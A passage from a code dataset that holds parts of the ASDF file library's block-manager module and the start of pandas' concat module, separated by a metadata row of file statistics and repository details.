    # Make enough room at the beginning for the tree, by popping off
    # blocks at the beginning
    while len(fixed) and fixed[0].start < tree_size:
        unfix_block(0)
    if not len(fixed):
        return False
    # This algorithm is pretty basic at this point -- it just looks
    # for the first open spot big enough for the free block to fit.
    while len(free):
        block = free.pop()
        last_end = tree_size
        for entry in fixed:
            if entry.start - last_end >= block.size:
                fix_block(block, last_end)
                break
            last_end = entry.end
        else:
            # No gap was big enough: append after the last fixed block,
            # leaving the configured padding behind it.
            padding = util.calculate_padding(
                entry.block.size, pad_blocks, block_size)
            fix_block(block, last_end + padding)
    if blocks.streamed_block is not None:
        # The streamed block must come last, after padding.
        padding = util.calculate_padding(
            fixed[-1].block.size, pad_blocks, block_size)
        blocks.streamed_block.offset = fixed[-1].end + padding
    blocks._sort_blocks_by_offset()
    return True
| 33.304383 | 85 | 0.569959 |
from __future__ import absolute_import, division, unicode_literals, print_function
from collections import namedtuple
import copy
import hashlib
import io
import os
import re
import struct
import weakref
import numpy as np
import six
from six.moves.urllib import parse as urlparse
import yaml
from . import compression as mcompression
from .compat.numpycompat import NUMPY_LT_1_7
from . import constants
from . import generic_io
from . import stream
from . import treeutil
from . import util
from . import yamlutil
class BlockManager(object):
def __init__(self, asdffile):
self._asdffile = weakref.ref(asdffile)
self._internal_blocks = []
self._external_blocks = []
self._inline_blocks = []
self._streamed_blocks = []
self._block_type_mapping = {
'internal': self._internal_blocks,
'external': self._external_blocks,
'inline': self._inline_blocks,
'streamed': self._streamed_blocks
}
self._data_to_block_mapping = {}
self._validate_checksums = False
def __len__(self):
return sum(len(x) for x in self._block_type_mapping.values())
def add(self, block):
block_set = self._block_type_mapping.get(block.array_storage, None)
if block_set is not None:
if block not in block_set:
block_set.append(block)
else:
raise ValueError(
"Unknown array storage type {0}".format(block.array_storage))
if block.array_storage == 'streamed' and len(self._streamed_blocks) > 1:
raise ValueError("Can not add second streaming block")
if block._data is not None:
self._data_to_block_mapping[id(block._data)] = block
def remove(self, block):
block_set = self._block_type_mapping.get(block.array_storage, None)
if block_set is not None:
if block in block_set:
block_set.remove(block)
if block._data is not None:
if id(block._data) in self._data_to_block_mapping:
del self._data_to_block_mapping[id(block._data)]
else:
raise ValueError(
"Unknown array storage type {0}".format(block.array_storage))
def set_array_storage(self, block, array_storage):
if array_storage not in ['internal', 'external', 'streamed', 'inline']:
raise ValueError(
"array_storage must be one of 'internal', 'external', "
"'streamed' or 'inline'")
if block.array_storage != array_storage:
if block in self.blocks:
self.remove(block)
block._array_storage = array_storage
self.add(block)
if array_storage == 'streamed':
block.compression = None
@property
def blocks(self):
for block_set in self._block_type_mapping.values():
for block in block_set:
yield block
@property
def internal_blocks(self):
for block_set in (self._internal_blocks, self._streamed_blocks):
for block in block_set:
yield block
@property
def streamed_block(self):
self.finish_reading_internal_blocks()
if len(self._streamed_blocks):
return self._streamed_blocks[0]
@property
def external_blocks(self):
for block in self._external_blocks:
yield block
@property
def inline_blocks(self):
for block in self._inline_blocks:
yield block
def has_blocks_with_offset(self):
for block in self.internal_blocks:
if block.offset is not None:
return True
return False
def _sort_blocks_by_offset(self):
def sorter(x):
if x.offset is None:
raise ValueError('Block is missing offset')
else:
return x.offset
self._internal_blocks.sort(key=sorter)
def _read_next_internal_block(self, fd, past_magic=False):
block = Block().read(
fd, past_magic=past_magic,
validate_checksum=self._validate_checksums)
if block is not None:
self.add(block)
return block
def read_internal_blocks(self, fd, past_magic=False,
validate_checksums=False):
self._validate_checksums = validate_checksums
while True:
block = self._read_next_internal_block(fd, past_magic=past_magic)
if block is None:
break
past_magic = False
if fd.seekable():
break
def finish_reading_internal_blocks(self):
if len(self._internal_blocks):
for i, block in enumerate(self._internal_blocks):
if isinstance(block, UnloadedBlock):
block.load()
last_block = self._internal_blocks[-1]
if (last_block._fd is not None and
last_block._fd.seekable()):
last_block._fd.seek(last_block.end_offset)
while True:
last_block = self._read_next_internal_block(
last_block._fd, False)
if last_block is None:
break
def write_internal_blocks_serial(self, fd, pad_blocks=False):
for block in self.internal_blocks:
if block.is_compressed:
block.offset = fd.tell()
block.write(fd)
else:
padding = util.calculate_padding(
block.size, pad_blocks, fd.block_size)
block.allocated = block._size + padding
block.offset = fd.tell()
block.write(fd)
fd.fast_forward(block.allocated - block._size)
def write_internal_blocks_random_access(self, fd):
self._sort_blocks_by_offset()
iter = self.internal_blocks
last_block = next(iter)
fd.clear(last_block.offset - fd.tell())
for block in iter:
last_block.allocated = ((block.offset - last_block.offset) -
last_block.header_size)
fd.seek(last_block.offset)
last_block.write(fd)
last_block = block
last_block.allocated = last_block.size
fd.seek(last_block.offset)
last_block.write(fd)
fd.truncate(last_block.end_offset)
def write_external_blocks(self, uri, pad_blocks=False):
from . import asdf
for i, block in enumerate(self.external_blocks):
if uri is None:
raise ValueError(
"Can't write external blocks, since URI of main file is "
"unknown.")
subfd = self.get_external_uri(uri, i)
asdffile = asdf.AsdfFile()
block = copy.copy(block)
block._array_storage = 'internal'
asdffile.blocks.add(block)
block._used = True
asdffile.write_to(subfd, pad_blocks=pad_blocks)
def write_block_index(self, fd, ctx):
if len(self._internal_blocks) and not len(self._streamed_blocks):
fd.write(constants.INDEX_HEADER)
fd.write(b'\n')
offsets = [x.offset for x in self.internal_blocks]
yaml_version = tuple(
int(x) for x in ctx.version_map['YAML_VERSION'].split('.'))
yaml.dump(
offsets, Dumper=yamlutil._yaml_base_dumper, stream=fd,
explicit_start=True, explicit_end=True,
version=yaml_version,
allow_unicode=True, encoding='utf-8')
_re_index_content = re.compile(
b'^' + constants.INDEX_HEADER + b'\r?\n%YAML.*\.\.\.\r?\n?$')
_re_index_misc = re.compile(b'^[\n\r\x20-\x7f]+$')
def read_block_index(self, fd, ctx):
# everything can still be read from the file, only slower.
# Importantly, it must remain "transactionally clean", and not
# create any blocks until we're sure the block index makes
if not fd.seekable():
return
if not len(self._internal_blocks):
return
first_block = self._internal_blocks[0]
first_block_end = first_block.end_offset
fd.seek(0, generic_io.SEEK_END)
file_size = block_end = fd.tell()
block_start = ((block_end - 5) // fd.block_size) * fd.block_size
buff_size = block_end - block_start
content = b''
fd.seek(block_start, generic_io.SEEK_SET)
buff = fd.read(buff_size)
buff = buff.rstrip(b'\0')
content = buff
# block index
for ending in (b'...', b'...\r\n', b'...\n'):
if content.endswith(ending):
break
else:
return
# Read blocks in reverse order from the end of the file
while True:
# Look for the index header
idx = content.find(constants.INDEX_HEADER)
if idx != -1:
content = content[idx:]
index_start = block_start + idx
break
else:
# If the rest of it starts to look like binary
# values, bail...
if not self._re_index_misc.match(buff):
return
if block_start <= first_block_end:
return
block_end = block_start
block_start = max(block_end - fd.block_size, first_block_end)
fd.seek(block_start, generic_io.SEEK_SET)
buff_size = block_end - block_start
buff = fd.read(buff_size)
content = buff + content
yaml_content = content[content.find(b'\n') + 1:]
offsets = yaml.load(yaml_content,
Loader=yamlutil._yaml_base_loader)
# Make sure the indices look sane
if not isinstance(offsets, list) or len(offsets) == 0:
return
last_offset = 0
for x in offsets:
if (not isinstance(x, six.integer_types) or
x > file_size or
x < 0 or
x <= last_offset + Block._header.size):
return
last_offset = x
# We always read the first block, so we can confirm that the
# first entry in the block index matches the first block
if offsets[0] != first_block.offset:
return
if len(offsets) == 1:
# If there's only one block in the index, we've already
# loaded the first block, so just return: we have nothing
# left to do
return
# One last sanity check: Read the last block in the index and
# make sure it makes sense.
fd.seek(offsets[-1], generic_io.SEEK_SET)
try:
block = Block().read(fd)
except (ValueError, IOError):
return
# Now see if the end of the last block leads right into the index
if (block.end_offset != index_start):
return
# It seems we're good to go, so instantiate the UnloadedBlock
for offset in offsets[1:-1]:
self._internal_blocks.append(UnloadedBlock(fd, offset))
self._internal_blocks.append(block)
def get_external_filename(self, filename, index):
filename = os.path.splitext(filename)[0]
return filename + '{0:04d}.asdf'.format(index)
def get_external_uri(self, uri, index):
if uri is None:
uri = ''
parts = list(urlparse.urlparse(uri))
path = parts[2]
dirname, filename = os.path.split(path)
filename = self.get_external_filename(filename, index)
path = os.path.join(dirname, filename)
parts[2] = path
return urlparse.urlunparse(parts)
def _find_used_blocks(self, tree, ctx):
reserved_blocks = set()
for node in treeutil.iter_tree(tree):
hook = ctx.type_index.get_hook_for_type(
'reserve_blocks', type(node), ctx.version_string)
if hook is not None:
for block in hook(node, ctx):
reserved_blocks.add(block)
for block in list(self.blocks):
if (getattr(block, '_used', 0) == 0 and
block not in reserved_blocks):
self.remove(block)
def _handle_global_block_settings(self, ctx, block):
all_array_storage = getattr(ctx, '_all_array_storage', None)
if all_array_storage:
self.set_array_storage(block, all_array_storage)
all_array_compression = getattr(ctx, '_all_array_compression', None)
if all_array_compression:
block.compression = all_array_compression
auto_inline = getattr(ctx, '_auto_inline', None)
if auto_inline:
if np.product(block.data.shape) < auto_inline:
self.set_array_storage(block, 'inline')
def finalize(self, ctx):
# isn't) afterword?
self._find_used_blocks(ctx.tree, ctx)
for block in list(self.blocks):
self._handle_global_block_settings(ctx, block)
def get_block(self, source):
if isinstance(source, six.integer_types):
if source == -1:
if len(self._streamed_blocks):
return self._streamed_blocks[0]
# we can read all of the blocks, ultimately arriving
# at the last one, which, if all goes well is a
# streamed block.
# First, look in the blocks we've already read
elif source >= 0:
if source < len(self._internal_blocks):
return self._internal_blocks[source]
else:
raise ValueError("Invalid source id {0}".format(source))
# new blocks.
if len(self._streamed_blocks) or len(self._internal_blocks) == 0:
raise ValueError("Block '{0}' not found.".format(source))
# If the desired block hasn't already been read, and the
last_block = self._internal_blocks[-1]
if (last_block._fd is not None and
last_block._fd.seekable()):
last_block._fd.seek(last_block.end_offset)
while True:
next_block = self._read_next_internal_block(
last_block._fd, False)
if next_block is None:
break
if len(self._internal_blocks) - 1 == source:
return next_block
last_block = next_block
if (source == -1 and
last_block.array_storage == 'streamed'):
return last_block
raise ValueError("Block '{0}' not found.".format(source))
elif isinstance(source, six.string_types):
asdffile = self._asdffile().open_external(
source, do_not_fill_defaults=True)
block = asdffile.blocks._internal_blocks[0]
self.set_array_storage(block, 'external')
else:
raise TypeError("Unknown source '{0}'".format(source))
return block
def get_source(self, block):
for i, internal_block in enumerate(self.internal_blocks):
if block == internal_block:
if internal_block.array_storage == 'streamed':
return -1
return i
for i, external_block in enumerate(self.external_blocks):
if block == external_block:
if self._asdffile().uri is None:
raise ValueError(
"Can't write external blocks, since URI of main file is "
"unknown.")
parts = list(urlparse.urlparse(self._asdffile().uri))
path = parts[2]
filename = os.path.basename(path)
return self.get_external_filename(filename, i)
raise ValueError("block not found.")
def find_or_create_block_for_array(self, arr, ctx):
from .tags.core import ndarray
if (isinstance(arr, ndarray.NDArrayType) and
arr.block is not None):
if arr.block in self.blocks:
return arr.block
else:
arr._block = None
base = util.get_array_base(arr)
block = self._data_to_block_mapping.get(id(base))
if block is not None:
return block
block = Block(base)
self.add(block)
self._handle_global_block_settings(ctx, block)
return block
def get_streamed_block(self):
block = self.streamed_block
if block is None:
block = Block(array_storage='streamed')
self.add(block)
return block
def add_inline(self, array):
block = Block(array, array_storage='inline')
self.add(block)
return block
def __getitem__(self, arr):
return self.find_or_create_block_for_array(arr, object())
def close(self):
for block in self.blocks:
block.close()
class Block(object):
_header = util.BinaryStruct([
('flags', 'I'),
('compression', '4s'),
('allocated_size', 'Q'),
('used_size', 'Q'),
('data_size', 'Q'),
('checksum', '16s')
])
def __init__(self, data=None, uri=None, array_storage='internal'):
self._data = data
self._uri = uri
self._array_storage = array_storage
self._fd = None
self._offset = None
self._compression = None
self._checksum = None
self._memmapped = False
self.update_size()
self._allocated = self._size
def __repr__(self):
return '<Block {0} off: {1} alc: {2} siz: {3}>'.format(
self._array_storage[:3], self._offset, self._allocated,
self._size)
def __len__(self):
return self._size
@property
def offset(self):
return self._offset
@offset.setter
def offset(self, offset):
self._offset = offset
@property
def allocated(self):
return self._allocated
@allocated.setter
def allocated(self, allocated):
self._allocated = allocated
@property
def header_size(self):
return self._header.size + constants.BLOCK_HEADER_BOILERPLATE_SIZE
@property
def data_offset(self):
return self._offset + self.header_size
@property
def size(self):
return self._size + self.header_size
@property
def end_offset(self):
return self.offset + self.header_size + self.allocated
def override_byteorder(self, byteorder):
return byteorder
@property
def array_storage(self):
return self._array_storage
@property
def compression(self):
return self._compression
@compression.setter
def compression(self, compression):
self._compression = mcompression.validate(compression)
@property
def is_compressed(self):
return self._compression is not None
@property
def checksum(self):
return self._checksum
def _set_checksum(self, checksum):
if checksum == b'\0' * 16:
self._checksum = None
else:
self._checksum = checksum
def _calculate_checksum(self, data):
m = hashlib.new('md5')
m.update(self.data)
return m.digest()
def validate_checksum(self):
if self._checksum:
checksum = self._calculate_checksum(self.data)
if checksum != self._checksum:
return False
return True
def update_checksum(self):
self._checksum = self._calculate_checksum(self.data)
def update_size(self):
if self._data is not None:
if six.PY2:
self._data_size = len(self._data.data)
else:
self._data_size = self._data.data.nbytes
if not self.is_compressed:
self._size = self._data_size
else:
self._size = mcompression.get_compressed_size(
self._data, self.compression)
else:
self._data_size = self._size = 0
def read(self, fd, past_magic=False, validate_checksum=False):
offset = None
if fd.seekable():
offset = fd.tell()
if not past_magic:
buff = fd.read(len(constants.BLOCK_MAGIC))
if len(buff) < 4:
return None
if buff not in (constants.BLOCK_MAGIC,
constants.INDEX_HEADER[:len(buff)]):
raise ValueError(
"Bad magic number in block. "
"This may indicate an internal inconsistency about the "
"sizes of the blocks in the file.")
if buff == constants.INDEX_HEADER[:len(buff)]:
return None
elif offset is not None:
offset -= 4
buff = fd.read(2)
header_size, = struct.unpack(b'>H', buff)
if header_size < self._header.size:
raise ValueError(
"Header size must be >= {0}".format(self._header.size))
buff = fd.read(header_size)
header = self._header.unpack(buff)
# This is used by the documentation system, but nowhere else.
self._flags = header['flags']
self.compression = header['compression']
self._set_checksum(header['checksum'])
if (self.compression is None and
header['used_size'] != header['data_size']):
raise ValueError(
"used_size and data_size must be equal when no compression is used.")
if (header['flags'] & constants.BLOCK_FLAG_STREAMED and
self.compression is not None):
raise ValueError(
"Compression set on a streamed block.")
if fd.seekable():
# If the file is seekable, we can delay reading the actual
# data until later.
self._fd = fd
self._header_size = header_size
self._offset = offset
if header['flags'] & constants.BLOCK_FLAG_STREAMED:
# Support streaming blocks
fd.fast_forward(-1)
self._array_storage = 'streamed'
self._data_size = self._size = self._allocated = \
(fd.tell() - self.data_offset) + 1
else:
fd.fast_forward(header['allocated_size'])
self._allocated = header['allocated_size']
self._size = header['used_size']
self._data_size = header['data_size']
else:
# If the file is a stream, we need to get the data now.
if header['flags'] & constants.BLOCK_FLAG_STREAMED:
# Support streaming blocks
self._array_storage = 'streamed'
self._data = fd.read_into_array(-1)
self._data_size = self._size = self._allocated = len(self._data)
else:
self._data_size = header['data_size']
self._size = header['used_size']
self._allocated = header['allocated_size']
self._data = self._read_data(
fd, self._size, self._data_size, self.compression)
fd.fast_forward(self._allocated - self._size)
fd.close()
if validate_checksum and not self.validate_checksum():
raise ValueError(
"Block at {0} does not match given checksum".format(
self._offset))
return self
def _read_data(self, fd, used_size, data_size, compression):
if not compression:
return fd.read_into_array(used_size)
else:
return mcompression.decompress(
fd, used_size, data_size, compression)
def write(self, fd):
self._header_size = self._header.size
flags = 0
data_size = used_size = allocated_size = 0
if self._array_storage == 'streamed':
flags |= constants.BLOCK_FLAG_STREAMED
elif self._data is not None:
self.update_checksum()
if not fd.seekable() and self.is_compressed:
buff = io.BytesIO()
mcompression.compress(buff, self._data, self.compression)
self.allocated = self._size = buff.tell()
data_size = self._data.nbytes
allocated_size = self.allocated
used_size = self._size
if self.checksum is not None:
checksum = self.checksum
else:
checksum = b'\0' * 16
fd.write(constants.BLOCK_MAGIC)
fd.write(struct.pack(b'>H', self._header_size))
fd.write(self._header.pack(
flags=flags,
compression=mcompression.to_compression_header(
self.compression),
allocated_size=allocated_size,
used_size=used_size, data_size=data_size,
checksum=checksum))
if self._data is not None:
if self.is_compressed:
if not fd.seekable():
fd.write(buff.getvalue())
else:
# If the file is seekable, we write the
# compressed data directly to it, then go back
# and write the resulting size in the block
# header.
start = fd.tell()
mcompression.compress(fd, self._data, self.compression)
end = fd.tell()
self.allocated = self._size = end - start
fd.seek(self.offset + 6)
self._header.update(
fd,
allocated_size=self.allocated,
used_size=self._size)
fd.seek(end)
else:
fd.write_array(self._data)
@property
def data(self):
if self._data is None:
if self._fd.is_closed():
raise IOError(
"ASDF file has already been closed. "
"Can not get the data.")
# Be nice and reset the file position after we're done
curpos = self._fd.tell()
try:
if not self.is_compressed and self._fd.can_memmap():
self._data = self._fd.memmap_array(
self.data_offset, self._size)
self._memmapped = True
else:
self._fd.seek(self.data_offset)
self._data = self._read_data(
self._fd, self._size, self._data_size,
self.compression)
finally:
self._fd.seek(curpos)
return self._data
def close(self):
if self._memmapped and self._data is not None:
if NUMPY_LT_1_7:
try:
self._data.flush()
except ValueError:
pass
else:
self._data.flush()
if self._data._mmap is not None:
self._data._mmap.close()
self._data = None
class UnloadedBlock(object):
def __init__(self, fd, offset):
self._fd = fd
self._offset = offset
self._data = None
self._uri = None
self._array_storage = 'internal'
self._compression = None
self._checksum = None
self._memmapped = False
def __len__(self):
self.load()
return len(self)
def close(self):
pass
@property
def array_storage(self):
return 'internal'
@property
def offset(self):
return self._offset
def __getattr__(self, attr):
self.load()
return getattr(self, attr)
def load(self):
self._fd.seek(self._offset, generic_io.SEEK_SET)
self.__class__ = Block
self.read(self._fd)
def calculate_updated_layout(blocks, tree_size, pad_blocks, block_size):
def unfix_block(i):
entry = fixed[i]
copy = entry.block.data.copy()
entry.block.close()
entry.block._data = copy
del fixed[i]
free.append(entry.block)
def fix_block(block, offset):
block.offset = offset
fixed.append(Entry(block.offset, block.offset + block.size, block))
fixed.sort()
Entry = namedtuple("Entry", ['start', 'end', 'block'])
fixed = []
free = []
for block in blocks._internal_blocks:
if block.offset is not None:
block.update_size()
fixed.append(
Entry(block.offset, block.offset + block.size, block))
else:
free.append(block)
if not len(fixed):
return False
fixed.sort()
while len(fixed) and fixed[0].start < tree_size:
unfix_block(0)
if not len(fixed):
return False
while len(free):
block = free.pop()
last_end = tree_size
for entry in fixed:
if entry.start - last_end >= block.size:
fix_block(block, last_end)
break
last_end = entry.end
else:
padding = util.calculate_padding(
entry.block.size, pad_blocks, block_size)
fix_block(block, last_end + padding)
if blocks.streamed_block is not None:
padding = util.calculate_padding(
fixed[-1].block.size, pad_blocks, block_size)
blocks.streamed_block.offset = fixed[-1].end + padding
blocks._sort_blocks_by_offset()
return True
| true | true |
1c2c97d6680a3f3e3a80c84d1ae03684c0396467 | 22,260 | py | Python | pandas/core/reshape/concat.py | kpflugshaupt/pandas | c9e3883c630c48b17218e6bcc5593720c1402bf1 | [
"BSD-3-Clause"
] | 2 | 2021-04-07T13:56:06.000Z | 2021-04-12T13:45:23.000Z | pandas/core/reshape/concat.py | sanjusci/pandas | a1fee9199eba7ebf423880243936b9f1501d3d3a | [
"BSD-3-Clause"
] | null | null | null | pandas/core/reshape/concat.py | sanjusci/pandas | a1fee9199eba7ebf423880243936b9f1501d3d3a | [
"BSD-3-Clause"
] | 3 | 2018-01-08T08:40:55.000Z | 2019-10-07T02:02:40.000Z | """
concat routines
"""
import numpy as np
import pandas.core.dtypes.concat as _concat
from pandas import DataFrame, Index, MultiIndex, Series, compat
from pandas.core import common as com
from pandas.core.arrays.categorical import (
_factorize_from_iterable, _factorize_from_iterables)
from pandas.core.generic import NDFrame
from pandas.core.index import (
_all_indexes_same, _get_consensus_names, _get_objs_combined_axis,
ensure_index)
import pandas.core.indexes.base as ibase
from pandas.core.internals import concatenate_block_managers
# ---------------------------------------------------------------------
# Concatenate DataFrame objects
def concat(objs, axis=0, join='outer', join_axes=None, ignore_index=False,
           keys=None, levels=None, names=None, verify_integrity=False,
           sort=None, copy=True):
    """
    Concatenate pandas objects along a particular axis with optional set
    logic along the other axes.

    Can also add a layer of hierarchical indexing on the concatenation
    axis, which may be useful if the labels are the same (or overlapping)
    on the passed axis number.

    Parameters
    ----------
    objs : a sequence or mapping of Series, DataFrame, or Panel objects
        If a dict is passed, the sorted keys will be used as the `keys`
        argument, unless it is passed, in which case the values will be
        selected. Any None objects will be dropped silently unless they
        are all None, in which case a ValueError will be raised.
    axis : {0/'index', 1/'columns'}, default 0
        The axis to concatenate along.
    join : {'inner', 'outer'}, default 'outer'
        How to handle indexes on other axis (or axes).
    join_axes : list of Index objects
        Specific indexes to use for the other n - 1 axes instead of
        performing inner/outer set logic.
    ignore_index : bool, default False
        If True, do not use the index values along the concatenation
        axis; the resulting axis will be labeled 0, ..., n - 1. Index
        values on the other axes are still respected in the join.
    keys : sequence, default None
        If multiple levels passed, should contain tuples. Construct a
        hierarchical index using the passed keys as the outermost level.
    levels : list of sequences, default None
        Specific levels (unique values) to use for constructing a
        MultiIndex. Otherwise they will be inferred from the keys.
    names : list, default None
        Names for the levels in the resulting hierarchical index.
    verify_integrity : bool, default False
        Check whether the new concatenated axis contains duplicates. This
        can be very expensive relative to the actual data concatenation.
    sort : bool, default None
        Sort non-concatenation axis if it is not already aligned when
        `join` is 'outer'. The current default of sorting is deprecated;
        pass ``sort=True`` or ``sort=False`` explicitly to silence the
        warning. Has no effect when ``join='inner'``, which already
        preserves the order of the non-concatenation axis.

        .. versionadded:: 0.23.0
    copy : bool, default True
        If False, do not copy data unnecessarily.

    Returns
    -------
    object, type of objs
        A ``Series`` when concatenating only ``Series`` along the index
        (axis=0); otherwise a ``DataFrame``.

    See Also
    --------
    Series.append, DataFrame.append, DataFrame.join, DataFrame.merge
    """
    # All of the heavy lifting (validation, axis resolution and the
    # actual block-manager concatenation) lives in _Concatenator.
    concatenator = _Concatenator(objs, axis=axis, join=join,
                                 join_axes=join_axes, keys=keys,
                                 levels=levels, names=names,
                                 ignore_index=ignore_index,
                                 verify_integrity=verify_integrity,
                                 sort=sort, copy=copy)
    return concatenator.get_result()
class _Concatenator(object):
    """
    Orchestrates a concatenation operation for BlockManagers
    """
    def __init__(self, objs, axis=0, join='outer', join_axes=None,
                 keys=None, levels=None, names=None,
                 ignore_index=False, verify_integrity=False, copy=True,
                 sort=False):
        """Validate inputs, pick a sample object and precompute result axes."""
        if isinstance(objs, (NDFrame, str)):
            raise TypeError('first argument must be an iterable of pandas '
                            'objects, you passed an object of type '
                            '"{name}"'.format(name=type(objs).__name__))
        if join == 'outer':
            self.intersect = False
        elif join == 'inner':
            self.intersect = True
        else:  # pragma: no cover
            raise ValueError('Only can inner (intersect) or outer (union) '
                             'join the other axis')
        # A dict of objects is ordered by its (possibly explicit) keys.
        if isinstance(objs, dict):
            if keys is None:
                keys = com.dict_keys_to_ordered_list(objs)
            objs = [objs[k] for k in keys]
        else:
            objs = list(objs)
        if len(objs) == 0:
            raise ValueError('No objects to concatenate')
        if keys is None:
            objs = list(com._not_none(*objs))
        else:
            # #1649 -- drop None objects together with their keys.
            clean_keys = []
            clean_objs = []
            for k, v in zip(keys, objs):
                if v is None:
                    continue
                clean_keys.append(k)
                clean_objs.append(v)
            objs = clean_objs
            name = getattr(keys, 'name', None)
            keys = Index(clean_keys, name=name)
        if len(objs) == 0:
            raise ValueError('All objects passed were None')
        # consolidate data & figure out what our result ndim is going to be
        ndims = set()
        for obj in objs:
            if not isinstance(obj, (Series, DataFrame)):
                msg = ("cannot concatenate object of type '{}';"
                       ' only Series and DataFrame objs are valid'
                       .format(type(obj)))
                raise TypeError(msg)
            # consolidate
            obj._consolidate(inplace=True)
            ndims.add(obj.ndim)
        # get the sample
        # want the highest ndim that we have, and must be non-empty
        # unless all objs are empty
        sample = None
        if len(ndims) > 1:
            max_ndim = max(ndims)
            for obj in objs:
                if obj.ndim == max_ndim and np.sum(obj.shape):
                    sample = obj
                    break
        else:
            # filter out the empties if we have not multi-index possibilities
            # note to keep empty Series as it affect to result columns / name
            non_empties = [obj for obj in objs
                           if sum(obj.shape) > 0 or isinstance(obj, Series)]
            if (len(non_empties) and (keys is None and names is None and
                                      levels is None and
                                      join_axes is None and
                                      not self.intersect)):
                objs = non_empties
                sample = objs[0]
        if sample is None:
            sample = objs[0]
        self.objs = objs
        # Standardize axis parameter to int
        if isinstance(sample, Series):
            axis = DataFrame._get_axis_number(axis)
        else:
            axis = sample._get_axis_number(axis)
        # Need to flip BlockManager axis in the DataFrame special case
        self._is_frame = isinstance(sample, DataFrame)
        if self._is_frame:
            axis = 1 if axis == 0 else 0
        self._is_series = isinstance(sample, Series)
        if not 0 <= axis <= sample.ndim:
            raise AssertionError("axis must be between 0 and {ndim}, input was"
                                 " {axis}".format(ndim=sample.ndim, axis=axis))
        # if we have mixed ndims, then convert to highest ndim
        # creating column numbers as needed
        if len(ndims) > 1:
            current_column = 0
            max_ndim = sample.ndim
            self.objs, objs = [], self.objs
            for obj in objs:
                ndim = obj.ndim
                if ndim == max_ndim:
                    pass
                elif ndim != max_ndim - 1:
                    raise ValueError("cannot concatenate unaligned mixed "
                                     "dimensional NDFrame objects")
                else:
                    name = getattr(obj, 'name', None)
                    if ignore_index or name is None:
                        name = current_column
                        current_column += 1
                    # doing a row-wise concatenation so need everything
                    # to line up
                    if self._is_frame and axis == 1:
                        name = 0
                    obj = sample._constructor({name: obj})
                self.objs.append(obj)
        # note: this is the BlockManager axis (since DataFrame is transposed)
        self.axis = axis
        self.join_axes = join_axes
        self.keys = keys
        self.names = names or getattr(keys, 'names', None)
        self.levels = levels
        self.sort = sort
        self.ignore_index = ignore_index
        self.verify_integrity = verify_integrity
        self.copy = copy
        self.new_axes = self._get_new_axes()
    def get_result(self):
        """Assemble and return the concatenated Series or DataFrame."""
        # series only
        if self._is_series:
            # stack blocks
            if self.axis == 0:
                name = com.consensus_name_attr(self.objs)
                mgr = self.objs[0]._data.concat([x._data for x in self.objs],
                                                self.new_axes)
                cons = _concat._get_series_result_type(mgr, self.objs)
                return cons(mgr, name=name).__finalize__(self, method='concat')
            # combine as columns in a frame
            else:
                data = dict(zip(range(len(self.objs)), self.objs))
                cons = _concat._get_series_result_type(data)
                index, columns = self.new_axes
                df = cons(data, index=index)
                df.columns = columns
                return df.__finalize__(self, method='concat')
        # combine block managers
        else:
            mgrs_indexers = []
            for obj in self.objs:
                mgr = obj._data
                indexers = {}
                for ax, new_labels in enumerate(self.new_axes):
                    if ax == self.axis:
                        # Suppress reindexing on concat axis
                        continue
                    obj_labels = mgr.axes[ax]
                    if not new_labels.equals(obj_labels):
                        indexers[ax] = obj_labels.reindex(new_labels)[1]
                mgrs_indexers.append((obj._data, indexers))
            new_data = concatenate_block_managers(
                mgrs_indexers, self.new_axes, concat_axis=self.axis,
                copy=self.copy)
            if not self.copy:
                new_data._consolidate_inplace()
            cons = _concat._get_frame_result_type(new_data, self.objs)
            return (cons._from_axes(new_data, self.new_axes)
                    .__finalize__(self, method='concat'))
    def _get_result_dim(self):
        # Concatenating Series along axis=1 yields a 2-D result (DataFrame).
        if self._is_series and self.axis == 1:
            return 2
        else:
            return self.objs[0].ndim
    def _get_new_axes(self):
        """Compute the full list of result axes (one Index per dimension)."""
        ndim = self._get_result_dim()
        new_axes = [None] * ndim
        if self.join_axes is None:
            for i in range(ndim):
                if i == self.axis:
                    continue
                new_axes[i] = self._get_comb_axis(i)
        else:
            if len(self.join_axes) != ndim - 1:
                raise AssertionError("length of join_axes must be equal "
                                     "to {length}".format(length=ndim - 1))
            # ufff...
            indices = compat.lrange(ndim)
            indices.remove(self.axis)
            for i, ax in zip(indices, self.join_axes):
                new_axes[i] = ax
        new_axes[self.axis] = self._get_concat_axis()
        return new_axes
    def _get_comb_axis(self, i):
        # Union (or intersection when join='inner') of the objects'
        # indexes along axis i.
        data_axis = self.objs[0]._get_block_manager_axis(i)
        try:
            return _get_objs_combined_axis(self.objs, axis=data_axis,
                                           intersect=self.intersect,
                                           sort=self.sort)
        except IndexError:
            types = [type(x).__name__ for x in self.objs]
            raise TypeError("Cannot concatenate list of {types}"
                            .format(types=types))
    def _get_concat_axis(self):
        """
        Return index to be used along concatenation axis.
        """
        if self._is_series:
            if self.axis == 0:
                indexes = [x.index for x in self.objs]
            elif self.ignore_index:
                idx = ibase.default_index(len(self.objs))
                return idx
            elif self.keys is None:
                # Derive result column labels from Series names, numbering
                # the unnamed ones.
                names = [None] * len(self.objs)
                num = 0
                has_names = False
                for i, x in enumerate(self.objs):
                    if not isinstance(x, Series):
                        raise TypeError("Cannot concatenate type 'Series' "
                                        "with object of type {type!r}"
                                        .format(type=type(x).__name__))
                    if x.name is not None:
                        names[i] = x.name
                        has_names = True
                    else:
                        names[i] = num
                        num += 1
                if has_names:
                    return Index(names)
                else:
                    return ibase.default_index(len(self.objs))
            else:
                return ensure_index(self.keys).set_names(self.names)
        else:
            indexes = [x._data.axes[self.axis] for x in self.objs]
        if self.ignore_index:
            idx = ibase.default_index(sum(len(i) for i in indexes))
            return idx
        if self.keys is None:
            concat_axis = _concat_indexes(indexes)
        else:
            concat_axis = _make_concat_multiindex(indexes, self.keys,
                                                  self.levels, self.names)
        self._maybe_check_integrity(concat_axis)
        return concat_axis
    def _maybe_check_integrity(self, concat_index):
        # With verify_integrity=True, reject a result axis with duplicates.
        if self.verify_integrity:
            if not concat_index.is_unique:
                overlap = concat_index[concat_index.duplicated()].unique()
                raise ValueError('Indexes have overlapping values: '
                                 '{overlap!s}'.format(overlap=overlap))
def _concat_indexes(indexes):
return indexes[0].append(indexes[1:])
def _make_concat_multiindex(indexes, keys, levels=None, names=None):
    """
    Build the MultiIndex for the concatenation axis from the passed keys
    (one per concatenated object), optional explicit levels/names, and
    the objects' own indexes.
    """
    # Tuples as keys (or multiple explicit levels) mean the outer index
    # itself has several levels; zip the key tuples into per-level lists.
    if ((levels is None and isinstance(keys[0], tuple)) or
            (levels is not None and len(levels) > 1)):
